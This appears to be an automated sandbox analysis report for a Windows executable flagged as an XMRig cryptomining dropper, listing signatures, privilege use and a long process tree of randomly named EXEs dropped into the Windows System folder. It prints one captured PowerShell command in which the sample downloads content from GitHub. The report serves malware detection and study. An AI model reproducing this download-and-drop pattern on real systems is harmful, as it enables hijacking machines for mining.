Analysis Overview
SHA256
32ab93d8257de76a0c13557b37c15b30ea46e9cb36b0fdd583abb568c4cb9666
Threat Level: Known bad
The file 80dc2d7acd231de40f111d1119717ed0_NeikiAnalytics.exe was found to be: Known bad.
Malicious Activity Summary
xmrig
Xmrig family
XMRig Miner payload
XMRig Miner payload
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Modifies Installed Components in the registry
Loads dropped DLL
UPX packed file
Executes dropped EXE
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Drops file in Windows directory
Unsigned PE
Suspicious use of AdjustPrivilegeToken
Modifies Internet Explorer settings
Suspicious behavior: EnumeratesProcesses
Modifies registry class
Suspicious use of WriteProcessMemory
Enumerates system info in registry
Suspicious use of SetWindowsHookEx
Checks processor information in registry
Suspicious use of SendNotifyMessage
Checks SCSI registry key(s)
Suspicious use of FindShellTrayWindow
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-13 13:41
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xmrig family
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-13 13:41
Reported
2024-06-13 13:43
Platform
win7-20240611-en
Max time kernel
150s
Max time network
152s
Command Line
Signatures
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
Loads dropped DLL
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Windows directory
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\80dc2d7acd231de40f111d1119717ed0_NeikiAnalytics.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\80dc2d7acd231de40f111d1119717ed0_NeikiAnalytics.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\80dc2d7acd231de40f111d1119717ed0_NeikiAnalytics.exe
"C:\Users\Admin\AppData\Local\Temp\80dc2d7acd231de40f111d1119717ed0_NeikiAnalytics.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
C:\Windows\System\ihHqYSi.exe
C:\Windows\System\ihHqYSi.exe
C:\Windows\System\AzgLJdf.exe
C:\Windows\System\AzgLJdf.exe
C:\Windows\System\fFIKCNC.exe
C:\Windows\System\fFIKCNC.exe
C:\Windows\System\xCEwDvS.exe
C:\Windows\System\xCEwDvS.exe
C:\Windows\System\RZJSUNB.exe
C:\Windows\System\RZJSUNB.exe
C:\Windows\System\HGqhCUN.exe
C:\Windows\System\HGqhCUN.exe
C:\Windows\System\NciBgBh.exe
C:\Windows\System\NciBgBh.exe
C:\Windows\System\LhDDZfl.exe
C:\Windows\System\LhDDZfl.exe
C:\Windows\System\mNSYFdf.exe
C:\Windows\System\mNSYFdf.exe
C:\Windows\System\kWikGnv.exe
C:\Windows\System\kWikGnv.exe
C:\Windows\System\kbotozd.exe
C:\Windows\System\kbotozd.exe
C:\Windows\System\tpzSBcw.exe
C:\Windows\System\tpzSBcw.exe
C:\Windows\System\ajQqAFC.exe
C:\Windows\System\ajQqAFC.exe
C:\Windows\System\zUvvoeA.exe
C:\Windows\System\zUvvoeA.exe
C:\Windows\System\gqnWWLb.exe
C:\Windows\System\gqnWWLb.exe
C:\Windows\System\VkZxAir.exe
C:\Windows\System\VkZxAir.exe
C:\Windows\System\nPKtqSM.exe
C:\Windows\System\nPKtqSM.exe
C:\Windows\System\eapzPoI.exe
C:\Windows\System\eapzPoI.exe
C:\Windows\System\hatibAo.exe
C:\Windows\System\hatibAo.exe
C:\Windows\System\fDqIhKf.exe
C:\Windows\System\fDqIhKf.exe
C:\Windows\System\mvUjhXw.exe
C:\Windows\System\mvUjhXw.exe
C:\Windows\System\vxDaIRD.exe
C:\Windows\System\vxDaIRD.exe
C:\Windows\System\jeJxGuR.exe
C:\Windows\System\jeJxGuR.exe
C:\Windows\System\EAyhzNZ.exe
C:\Windows\System\EAyhzNZ.exe
C:\Windows\System\KNWuAXk.exe
C:\Windows\System\KNWuAXk.exe
C:\Windows\System\vbLpHXy.exe
C:\Windows\System\vbLpHXy.exe
C:\Windows\System\PteAUmB.exe
C:\Windows\System\PteAUmB.exe
C:\Windows\System\gZeYscW.exe
C:\Windows\System\gZeYscW.exe
C:\Windows\System\pSTRRPB.exe
C:\Windows\System\pSTRRPB.exe
C:\Windows\System\OVBuDUw.exe
C:\Windows\System\OVBuDUw.exe
C:\Windows\System\QxTuONe.exe
C:\Windows\System\QxTuONe.exe
C:\Windows\System\bhhBwUp.exe
C:\Windows\System\bhhBwUp.exe
C:\Windows\System\huLwSvy.exe
C:\Windows\System\huLwSvy.exe
C:\Windows\System\DSQRGyF.exe
C:\Windows\System\DSQRGyF.exe
C:\Windows\System\gOGoVKq.exe
C:\Windows\System\gOGoVKq.exe
C:\Windows\System\qzNcwtX.exe
C:\Windows\System\qzNcwtX.exe
C:\Windows\System\Kpwficn.exe
C:\Windows\System\Kpwficn.exe
C:\Windows\System\wcqwrXi.exe
C:\Windows\System\wcqwrXi.exe
C:\Windows\System\QKRJyrp.exe
C:\Windows\System\QKRJyrp.exe
C:\Windows\System\wednzVd.exe
C:\Windows\System\wednzVd.exe
C:\Windows\System\CPRUnzX.exe
C:\Windows\System\CPRUnzX.exe
C:\Windows\System\jhNsYhS.exe
C:\Windows\System\jhNsYhS.exe
C:\Windows\System\fjciXUK.exe
C:\Windows\System\fjciXUK.exe
C:\Windows\System\zJIVMVB.exe
C:\Windows\System\zJIVMVB.exe
C:\Windows\System\AhIwFeK.exe
C:\Windows\System\AhIwFeK.exe
C:\Windows\System\JwNlGse.exe
C:\Windows\System\JwNlGse.exe
C:\Windows\System\hDHHOfc.exe
C:\Windows\System\hDHHOfc.exe
C:\Windows\System\BhgJKlh.exe
C:\Windows\System\BhgJKlh.exe
C:\Windows\System\nRhMsuc.exe
C:\Windows\System\nRhMsuc.exe
C:\Windows\System\QLVCpla.exe
C:\Windows\System\QLVCpla.exe
C:\Windows\System\GyLyBCN.exe
C:\Windows\System\GyLyBCN.exe
C:\Windows\System\OaUuafh.exe
C:\Windows\System\OaUuafh.exe
C:\Windows\System\PmRAeRL.exe
C:\Windows\System\PmRAeRL.exe
C:\Windows\System\wdDArzE.exe
C:\Windows\System\wdDArzE.exe
C:\Windows\System\ZFmXhIL.exe
C:\Windows\System\ZFmXhIL.exe
C:\Windows\System\RAMNrcs.exe
C:\Windows\System\RAMNrcs.exe
C:\Windows\System\koNeKac.exe
C:\Windows\System\koNeKac.exe
C:\Windows\System\yTPhrIx.exe
C:\Windows\System\yTPhrIx.exe
C:\Windows\System\CaqoMVD.exe
C:\Windows\System\CaqoMVD.exe
C:\Windows\System\UGasvGa.exe
C:\Windows\System\UGasvGa.exe
C:\Windows\System\fHCZTIx.exe
C:\Windows\System\fHCZTIx.exe
C:\Windows\System\AnQOntg.exe
C:\Windows\System\AnQOntg.exe
C:\Windows\System\RrbIBwf.exe
C:\Windows\System\RrbIBwf.exe
C:\Windows\System\oMxVVmL.exe
C:\Windows\System\oMxVVmL.exe
C:\Windows\System\XWyRczf.exe
C:\Windows\System\XWyRczf.exe
C:\Windows\System\RjcGPwc.exe
C:\Windows\System\RjcGPwc.exe
C:\Windows\System\tlgAloT.exe
C:\Windows\System\tlgAloT.exe
C:\Windows\System\FTzcRNx.exe
C:\Windows\System\FTzcRNx.exe
C:\Windows\System\xfMVeuN.exe
C:\Windows\System\xfMVeuN.exe
C:\Windows\System\XLTkqoT.exe
C:\Windows\System\XLTkqoT.exe
C:\Windows\System\oSYwuHw.exe
C:\Windows\System\oSYwuHw.exe
C:\Windows\System\fkLjXjb.exe
C:\Windows\System\fkLjXjb.exe
C:\Windows\System\CnwhmFj.exe
C:\Windows\System\CnwhmFj.exe
C:\Windows\System\ecSMWln.exe
C:\Windows\System\ecSMWln.exe
C:\Windows\System\soUlgxH.exe
C:\Windows\System\soUlgxH.exe
C:\Windows\System\oNLQpLQ.exe
C:\Windows\System\oNLQpLQ.exe
C:\Windows\System\eNQJtXa.exe
C:\Windows\System\eNQJtXa.exe
C:\Windows\System\oFrsMap.exe
C:\Windows\System\oFrsMap.exe
C:\Windows\System\zeKlPVv.exe
C:\Windows\System\zeKlPVv.exe
C:\Windows\System\pCQcBqo.exe
C:\Windows\System\pCQcBqo.exe
C:\Windows\System\TpuZHLC.exe
C:\Windows\System\TpuZHLC.exe
C:\Windows\System\ruzyJhG.exe
C:\Windows\System\ruzyJhG.exe
C:\Windows\System\lLcbVPl.exe
C:\Windows\System\lLcbVPl.exe
C:\Windows\System\cPYTxJB.exe
C:\Windows\System\cPYTxJB.exe
C:\Windows\System\MoENmNw.exe
C:\Windows\System\MoENmNw.exe
C:\Windows\System\aXaDQZr.exe
C:\Windows\System\aXaDQZr.exe
C:\Windows\System\GBhidRn.exe
C:\Windows\System\GBhidRn.exe
C:\Windows\System\ZjnEnDo.exe
C:\Windows\System\ZjnEnDo.exe
C:\Windows\System\HhaSyLH.exe
C:\Windows\System\HhaSyLH.exe
C:\Windows\System\CVpWVsB.exe
C:\Windows\System\CVpWVsB.exe
C:\Windows\System\kKkkZim.exe
C:\Windows\System\kKkkZim.exe
C:\Windows\System\UoLUBQY.exe
C:\Windows\System\UoLUBQY.exe
C:\Windows\System\GYwwTLr.exe
C:\Windows\System\GYwwTLr.exe
C:\Windows\System\woyhoME.exe
C:\Windows\System\woyhoME.exe
C:\Windows\System\aSXvzCU.exe
C:\Windows\System\aSXvzCU.exe
C:\Windows\System\HBgTpRO.exe
C:\Windows\System\HBgTpRO.exe
C:\Windows\System\nHOsqyk.exe
C:\Windows\System\nHOsqyk.exe
C:\Windows\System\GnhqHgb.exe
C:\Windows\System\GnhqHgb.exe
C:\Windows\System\grywMzR.exe
C:\Windows\System\grywMzR.exe
C:\Windows\System\qAwsAEz.exe
C:\Windows\System\qAwsAEz.exe
C:\Windows\System\mvyiIln.exe
C:\Windows\System\mvyiIln.exe
C:\Windows\System\wCQQFrR.exe
C:\Windows\System\wCQQFrR.exe
C:\Windows\System\FhFyNhT.exe
C:\Windows\System\FhFyNhT.exe
C:\Windows\System\ureUBXU.exe
C:\Windows\System\ureUBXU.exe
C:\Windows\System\lXBMhCt.exe
C:\Windows\System\lXBMhCt.exe
C:\Windows\System\lKUwOee.exe
C:\Windows\System\lKUwOee.exe
C:\Windows\System\TjIFkxw.exe
C:\Windows\System\TjIFkxw.exe
C:\Windows\System\aoBxdDz.exe
C:\Windows\System\aoBxdDz.exe
C:\Windows\System\jgQppqI.exe
C:\Windows\System\jgQppqI.exe
C:\Windows\System\iiOQWPe.exe
C:\Windows\System\iiOQWPe.exe
C:\Windows\System\CnWeZLl.exe
C:\Windows\System\CnWeZLl.exe
C:\Windows\System\mPBTsNp.exe
C:\Windows\System\mPBTsNp.exe
C:\Windows\System\RzZtvBD.exe
C:\Windows\System\RzZtvBD.exe
C:\Windows\System\YEQWzMO.exe
C:\Windows\System\YEQWzMO.exe
C:\Windows\System\ocfsaTA.exe
C:\Windows\System\ocfsaTA.exe
C:\Windows\System\AihCZwk.exe
C:\Windows\System\AihCZwk.exe
C:\Windows\System\aWQuELw.exe
C:\Windows\System\aWQuELw.exe
C:\Windows\System\lcCxaXR.exe
C:\Windows\System\lcCxaXR.exe
C:\Windows\System\TXYKBWn.exe
C:\Windows\System\TXYKBWn.exe
C:\Windows\System\ggnOKwF.exe
C:\Windows\System\ggnOKwF.exe
C:\Windows\System\jFnpFVV.exe
C:\Windows\System\jFnpFVV.exe
C:\Windows\System\NkwhKcI.exe
C:\Windows\System\NkwhKcI.exe
C:\Windows\System\DasgbNE.exe
C:\Windows\System\DasgbNE.exe
C:\Windows\System\ITpyspf.exe
C:\Windows\System\ITpyspf.exe
C:\Windows\System\eagZIqk.exe
C:\Windows\System\eagZIqk.exe
C:\Windows\System\JnvzgpT.exe
C:\Windows\System\JnvzgpT.exe
C:\Windows\System\ZoLVsDB.exe
C:\Windows\System\ZoLVsDB.exe
C:\Windows\System\QQrOvIt.exe
C:\Windows\System\QQrOvIt.exe
C:\Windows\System\SPBWKol.exe
C:\Windows\System\SPBWKol.exe
C:\Windows\System\vCeQzMs.exe
C:\Windows\System\vCeQzMs.exe
C:\Windows\System\TrZWSDU.exe
C:\Windows\System\TrZWSDU.exe
C:\Windows\System\HohhLxR.exe
C:\Windows\System\HohhLxR.exe
C:\Windows\System\JABcRrU.exe
C:\Windows\System\JABcRrU.exe
C:\Windows\System\VAkwTyc.exe
C:\Windows\System\VAkwTyc.exe
C:\Windows\System\NMxMpMN.exe
C:\Windows\System\NMxMpMN.exe
C:\Windows\System\DRcmsTk.exe
C:\Windows\System\DRcmsTk.exe
C:\Windows\System\YEyIsmB.exe
C:\Windows\System\YEyIsmB.exe
C:\Windows\System\sAnsiyr.exe
C:\Windows\System\sAnsiyr.exe
C:\Windows\System\xvWHWWF.exe
C:\Windows\System\xvWHWWF.exe
C:\Windows\System\aOWWmlq.exe
C:\Windows\System\aOWWmlq.exe
C:\Windows\System\QqAvYmW.exe
C:\Windows\System\QqAvYmW.exe
C:\Windows\System\TBKWtQk.exe
C:\Windows\System\TBKWtQk.exe
C:\Windows\System\ZWNShhp.exe
C:\Windows\System\ZWNShhp.exe
C:\Windows\System\OvYGFeY.exe
C:\Windows\System\OvYGFeY.exe
C:\Windows\System\fLSXkbS.exe
C:\Windows\System\fLSXkbS.exe
C:\Windows\System\xMeDGyE.exe
C:\Windows\System\xMeDGyE.exe
C:\Windows\System\lGIydey.exe
C:\Windows\System\lGIydey.exe
C:\Windows\System\wXFHGHF.exe
C:\Windows\System\wXFHGHF.exe
C:\Windows\System\PvtmWPR.exe
C:\Windows\System\PvtmWPR.exe
C:\Windows\System\wCDthCB.exe
C:\Windows\System\wCDthCB.exe
C:\Windows\System\IRQQdPS.exe
C:\Windows\System\IRQQdPS.exe
C:\Windows\System\KoiTUFL.exe
C:\Windows\System\KoiTUFL.exe
C:\Windows\System\usuHGJP.exe
C:\Windows\System\usuHGJP.exe
C:\Windows\System\uOheitn.exe
C:\Windows\System\uOheitn.exe
C:\Windows\System\uFpTJvP.exe
C:\Windows\System\uFpTJvP.exe
C:\Windows\System\bXcKzKI.exe
C:\Windows\System\bXcKzKI.exe
C:\Windows\System\MxqXDkZ.exe
C:\Windows\System\MxqXDkZ.exe
C:\Windows\System\IarJynt.exe
C:\Windows\System\IarJynt.exe
C:\Windows\System\HjbshOn.exe
C:\Windows\System\HjbshOn.exe
C:\Windows\System\ngxwYaX.exe
C:\Windows\System\ngxwYaX.exe
C:\Windows\System\MsAcZfz.exe
C:\Windows\System\MsAcZfz.exe
C:\Windows\System\uDfdqlp.exe
C:\Windows\System\uDfdqlp.exe
C:\Windows\System\FWQzBAE.exe
C:\Windows\System\FWQzBAE.exe
C:\Windows\System\OpaWpZM.exe
C:\Windows\System\OpaWpZM.exe
C:\Windows\System\CHyPZOi.exe
C:\Windows\System\CHyPZOi.exe
C:\Windows\System\kfsBgym.exe
C:\Windows\System\kfsBgym.exe
C:\Windows\System\NpgBDAi.exe
C:\Windows\System\NpgBDAi.exe
C:\Windows\System\hxZoJpj.exe
C:\Windows\System\hxZoJpj.exe
C:\Windows\System\PKFCsWy.exe
C:\Windows\System\PKFCsWy.exe
C:\Windows\System\UZArGYx.exe
C:\Windows\System\UZArGYx.exe
C:\Windows\System\QNYPcfa.exe
C:\Windows\System\QNYPcfa.exe
C:\Windows\System\ovxjOTw.exe
C:\Windows\System\ovxjOTw.exe
C:\Windows\System\DuBFEiN.exe
C:\Windows\System\DuBFEiN.exe
C:\Windows\System\BlHQDNv.exe
C:\Windows\System\BlHQDNv.exe
C:\Windows\System\QHtfdQk.exe
C:\Windows\System\QHtfdQk.exe
C:\Windows\System\PCBdpFF.exe
C:\Windows\System\PCBdpFF.exe
C:\Windows\System\lGIbfin.exe
C:\Windows\System\lGIbfin.exe
C:\Windows\System\YYkdPny.exe
C:\Windows\System\YYkdPny.exe
C:\Windows\System\HZctmon.exe
C:\Windows\System\HZctmon.exe
C:\Windows\System\VqmjgTJ.exe
C:\Windows\System\VqmjgTJ.exe
C:\Windows\System\lkkKEZE.exe
C:\Windows\System\lkkKEZE.exe
C:\Windows\System\kujfRBc.exe
C:\Windows\System\kujfRBc.exe
C:\Windows\System\cktnVjR.exe
C:\Windows\System\cktnVjR.exe
C:\Windows\System\HCGTrgS.exe
C:\Windows\System\HCGTrgS.exe
C:\Windows\System\WbYQdrc.exe
C:\Windows\System\WbYQdrc.exe
C:\Windows\System\BEqNkVH.exe
C:\Windows\System\BEqNkVH.exe
C:\Windows\System\ZIbfASU.exe
C:\Windows\System\ZIbfASU.exe
C:\Windows\System\CYkiLqu.exe
C:\Windows\System\CYkiLqu.exe
C:\Windows\System\infNzMw.exe
C:\Windows\System\infNzMw.exe
C:\Windows\System\xsKGirH.exe
C:\Windows\System\xsKGirH.exe
C:\Windows\System\ABSQEUS.exe
C:\Windows\System\ABSQEUS.exe
C:\Windows\System\ZaLTAdi.exe
C:\Windows\System\ZaLTAdi.exe
C:\Windows\System\VVsPcSR.exe
C:\Windows\System\VVsPcSR.exe
C:\Windows\System\dWlxuzw.exe
C:\Windows\System\dWlxuzw.exe
C:\Windows\System\SXbDfiY.exe
C:\Windows\System\SXbDfiY.exe
C:\Windows\System\ABjTqgw.exe
C:\Windows\System\ABjTqgw.exe
C:\Windows\System\JTPJooz.exe
C:\Windows\System\JTPJooz.exe
C:\Windows\System\dmBdkxe.exe
C:\Windows\System\dmBdkxe.exe
C:\Windows\System\MFWNQnr.exe
C:\Windows\System\MFWNQnr.exe
C:\Windows\System\txnAgXV.exe
C:\Windows\System\txnAgXV.exe
C:\Windows\System\hWAUvWo.exe
C:\Windows\System\hWAUvWo.exe
C:\Windows\System\UWaiztu.exe
C:\Windows\System\UWaiztu.exe
C:\Windows\System\CwatHsn.exe
C:\Windows\System\CwatHsn.exe
C:\Windows\System\DbczboV.exe
C:\Windows\System\DbczboV.exe
C:\Windows\System\WQzdicN.exe
C:\Windows\System\WQzdicN.exe
C:\Windows\System\pWJsKlw.exe
C:\Windows\System\pWJsKlw.exe
C:\Windows\System\pqjfTPR.exe
C:\Windows\System\pqjfTPR.exe
C:\Windows\System\sVKzTPQ.exe
C:\Windows\System\sVKzTPQ.exe
C:\Windows\System\ZaFyXFz.exe
C:\Windows\System\ZaFyXFz.exe
C:\Windows\System\EYHQxUi.exe
C:\Windows\System\EYHQxUi.exe
C:\Windows\System\KciAodW.exe
C:\Windows\System\KciAodW.exe
C:\Windows\System\rrFJnDr.exe
C:\Windows\System\rrFJnDr.exe
C:\Windows\System\PlwqURJ.exe
C:\Windows\System\PlwqURJ.exe
C:\Windows\System\MldzaZd.exe
C:\Windows\System\MldzaZd.exe
C:\Windows\System\QNbrxym.exe
C:\Windows\System\QNbrxym.exe
C:\Windows\System\HfntBYu.exe
C:\Windows\System\HfntBYu.exe
C:\Windows\System\zMSZehd.exe
C:\Windows\System\zMSZehd.exe
C:\Windows\System\OsDqZSK.exe
C:\Windows\System\OsDqZSK.exe
C:\Windows\System\gfXivLU.exe
C:\Windows\System\gfXivLU.exe
C:\Windows\System\hCcUmiO.exe
C:\Windows\System\hCcUmiO.exe
C:\Windows\System\CziAFoK.exe
C:\Windows\System\CziAFoK.exe
C:\Windows\System\flYSAUE.exe
C:\Windows\System\flYSAUE.exe
C:\Windows\System\XAenTQg.exe
C:\Windows\System\XAenTQg.exe
C:\Windows\System\IFwbGAE.exe
C:\Windows\System\IFwbGAE.exe
C:\Windows\System\QqvGWLj.exe
C:\Windows\System\QqvGWLj.exe
C:\Windows\System\TpoPAuv.exe
C:\Windows\System\TpoPAuv.exe
C:\Windows\System\GnzNgBm.exe
C:\Windows\System\GnzNgBm.exe
C:\Windows\System\oOLUTVP.exe
C:\Windows\System\oOLUTVP.exe
C:\Windows\System\TQrEljN.exe
C:\Windows\System\TQrEljN.exe
C:\Windows\System\CdtPErh.exe
C:\Windows\System\CdtPErh.exe
C:\Windows\System\AVHInuX.exe
C:\Windows\System\AVHInuX.exe
C:\Windows\System\hdtIYgm.exe
C:\Windows\System\hdtIYgm.exe
C:\Windows\System\jGgoDNY.exe
C:\Windows\System\jGgoDNY.exe
C:\Windows\System\fTuhFvg.exe
C:\Windows\System\fTuhFvg.exe
C:\Windows\System\GZfletQ.exe
C:\Windows\System\GZfletQ.exe
C:\Windows\System\EiedzOG.exe
C:\Windows\System\EiedzOG.exe
C:\Windows\System\HRMkNfG.exe
C:\Windows\System\HRMkNfG.exe
C:\Windows\System\GQwaBIi.exe
C:\Windows\System\GQwaBIi.exe
C:\Windows\System\iHfhxbM.exe
C:\Windows\System\iHfhxbM.exe
C:\Windows\System\JMadVqJ.exe
C:\Windows\System\JMadVqJ.exe
C:\Windows\System\NwrukQB.exe
C:\Windows\System\NwrukQB.exe
C:\Windows\System\JNRApHl.exe
C:\Windows\System\JNRApHl.exe
C:\Windows\System\ubLVkKJ.exe
C:\Windows\System\ubLVkKJ.exe
C:\Windows\System\FWGRjQf.exe
C:\Windows\System\FWGRjQf.exe
C:\Windows\System\ZhNeITI.exe
C:\Windows\System\ZhNeITI.exe
C:\Windows\System\ddhShuc.exe
C:\Windows\System\ddhShuc.exe
C:\Windows\System\kuSphlU.exe
C:\Windows\System\kuSphlU.exe
C:\Windows\System\HaMKWkr.exe
C:\Windows\System\HaMKWkr.exe
C:\Windows\System\zsKBNyh.exe
C:\Windows\System\zsKBNyh.exe
C:\Windows\System\mSmINDN.exe
C:\Windows\System\mSmINDN.exe
C:\Windows\System\kloxIfx.exe
C:\Windows\System\kloxIfx.exe
C:\Windows\System\HhavJpv.exe
C:\Windows\System\HhavJpv.exe
C:\Windows\System\nnrUtrr.exe
C:\Windows\System\nnrUtrr.exe
C:\Windows\System\PJFWULc.exe
C:\Windows\System\PJFWULc.exe
C:\Windows\System\BeFjdHL.exe
C:\Windows\System\BeFjdHL.exe
C:\Windows\System\qSAubHX.exe
C:\Windows\System\qSAubHX.exe
C:\Windows\System\uqRCDaO.exe
C:\Windows\System\uqRCDaO.exe
C:\Windows\System\odnhnCD.exe
C:\Windows\System\odnhnCD.exe
C:\Windows\System\BdzXKmh.exe
C:\Windows\System\BdzXKmh.exe
C:\Windows\System\TDEKaow.exe
C:\Windows\System\TDEKaow.exe
C:\Windows\System\TUrVFyS.exe
C:\Windows\System\TUrVFyS.exe
C:\Windows\System\UYJQeHB.exe
C:\Windows\System\UYJQeHB.exe
C:\Windows\System\KnTTMbW.exe
C:\Windows\System\KnTTMbW.exe
C:\Windows\System\zmsZaTN.exe
C:\Windows\System\zmsZaTN.exe
C:\Windows\System\hsFNjMZ.exe
C:\Windows\System\hsFNjMZ.exe
C:\Windows\System\zfzMcHR.exe
C:\Windows\System\zfzMcHR.exe
C:\Windows\System\QrPObtA.exe
C:\Windows\System\QrPObtA.exe
C:\Windows\System\DgmQRpK.exe
C:\Windows\System\DgmQRpK.exe
C:\Windows\System\opvGjDg.exe
C:\Windows\System\opvGjDg.exe
C:\Windows\System\ODoQjnW.exe
C:\Windows\System\ODoQjnW.exe
C:\Windows\System\kehWJIm.exe
C:\Windows\System\kehWJIm.exe
C:\Windows\System\WCuHwDI.exe
C:\Windows\System\WCuHwDI.exe
C:\Windows\System\dYoJGJS.exe
C:\Windows\System\dYoJGJS.exe
C:\Windows\System\fGqEbpf.exe
C:\Windows\System\fGqEbpf.exe
C:\Windows\System\Abeeady.exe
C:\Windows\System\Abeeady.exe
C:\Windows\System\ETOPpBC.exe
C:\Windows\System\ETOPpBC.exe
C:\Windows\System\DMsRJUk.exe
C:\Windows\System\DMsRJUk.exe
C:\Windows\System\fXKjEbu.exe
C:\Windows\System\fXKjEbu.exe
C:\Windows\System\bZmQKrM.exe
C:\Windows\System\bZmQKrM.exe
C:\Windows\System\NYpKECk.exe
C:\Windows\System\NYpKECk.exe
C:\Windows\System\rsZYnsE.exe
C:\Windows\System\rsZYnsE.exe
C:\Windows\System\vxOMcvw.exe
C:\Windows\System\vxOMcvw.exe
C:\Windows\System\LqCctAI.exe
C:\Windows\System\LqCctAI.exe
C:\Windows\System\FhwDVEZ.exe
C:\Windows\System\FhwDVEZ.exe
C:\Windows\System\djTUnNb.exe
C:\Windows\System\djTUnNb.exe
C:\Windows\System\hwBAnrA.exe
C:\Windows\System\hwBAnrA.exe
C:\Windows\System\BNZLyUf.exe
C:\Windows\System\BNZLyUf.exe
C:\Windows\System\aAwyftp.exe
C:\Windows\System\aAwyftp.exe
C:\Windows\System\KLQqToS.exe
C:\Windows\System\KLQqToS.exe
C:\Windows\System\sgWhFEg.exe
C:\Windows\System\sgWhFEg.exe
C:\Windows\System\EeErfXo.exe
C:\Windows\System\EeErfXo.exe
C:\Windows\System\pPtoVuE.exe
C:\Windows\System\pPtoVuE.exe
C:\Windows\System\UsqQXEL.exe
C:\Windows\System\UsqQXEL.exe
C:\Windows\System\KPdOgSS.exe
C:\Windows\System\KPdOgSS.exe
C:\Windows\System\Cpulbup.exe
C:\Windows\System\Cpulbup.exe
C:\Windows\System\BkyGGSY.exe
C:\Windows\System\BkyGGSY.exe
C:\Windows\System\qibPXaA.exe
C:\Windows\System\qibPXaA.exe
C:\Windows\System\jqRaHpj.exe
C:\Windows\System\jqRaHpj.exe
C:\Windows\System\YXbRfmx.exe
C:\Windows\System\YXbRfmx.exe
C:\Windows\System\LBmNOvd.exe
C:\Windows\System\LBmNOvd.exe
C:\Windows\System\wLtKZvr.exe
C:\Windows\System\wLtKZvr.exe
C:\Windows\System\OncwCeX.exe
C:\Windows\System\OncwCeX.exe
C:\Windows\System\GjNoCpq.exe
C:\Windows\System\GjNoCpq.exe
C:\Windows\System\czghvPx.exe
C:\Windows\System\czghvPx.exe
C:\Windows\System\bXubdZp.exe
C:\Windows\System\bXubdZp.exe
C:\Windows\System\GIhFrSU.exe
C:\Windows\System\GIhFrSU.exe
C:\Windows\System\uYjUpzH.exe
C:\Windows\System\uYjUpzH.exe
C:\Windows\System\jLvsDDL.exe
C:\Windows\System\jLvsDDL.exe
C:\Windows\System\CHZBSOP.exe
C:\Windows\System\CHZBSOP.exe
C:\Windows\System\qIGWNcu.exe
C:\Windows\System\qIGWNcu.exe
